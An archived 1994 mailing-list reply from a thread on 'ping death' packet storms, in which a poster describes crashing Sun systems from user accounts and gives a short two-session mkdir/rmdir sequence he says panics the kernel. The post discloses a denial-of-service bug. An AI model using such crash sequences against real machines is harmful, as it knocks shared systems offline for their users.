Re: udp packet storms - ping death

Charles Howes (chowes@helix.net)
Thu, 3 Nov 1994 22:53:49 -0800 (PST)

Messages sorted by: [ date ][ thread ][ subject ][ author ]
Next message: Paul O'Donnell: "Re: udp packet storms - ping death"
Previous message: Karl Strickland: "Re: udp packet storms - ping death"
In reply to: Perry E. Metzger: "Re: udp packet storms - ping death"
Next in thread: Paul O'Donnell: "Re: udp packet storms - ping death"

On Wed, 2 Nov 1994, Perry E. Metzger wrote:

> Charles Howes says:
> > > Our copy of ping is installed setuid root; ...
> > 
> > So you mean that any student at princeton can panic any Sun there just by
> > typing that command?  Cool...
> 
> There are already so many ways to panic suns from userland...

Yes, I've found one that's rather easy:

Sign on twice.  Transcript one:
  cd /tmp
  mkdir foo
  cd foo
   (*)
  mkdir bar

Transcript two:  (Executed at '*' in transcript one)
  cd /tmp
  rmdir foo

I don't think you can remove the 'mkdir' part of the kernel without
causing some major problems.

--
Charles Howes -- chowes@helix.net
 Always tell the truth, then you make it the other bloke's problem! 
 - Sean Connery, 1971

Next message: Paul O'Donnell: "Re: udp packet storms - ping death"
Previous message: Karl Strickland: "Re: udp packet storms - ping death"
In reply to: Perry E. Metzger: "Re: udp packet storms - ping death"
Next in thread: Paul O'Donnell: "Re: udp packet storms - ping death"